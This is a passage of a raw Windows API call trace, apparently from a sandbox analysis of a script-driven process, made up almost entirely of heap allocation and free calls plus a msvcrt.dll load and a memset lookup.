Size=0x24) returned 0x8dc1c8 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0172.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.895] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.897] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2858 [0172.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2858, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.898] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.899] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.902] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.902] RtlAllocateHeap 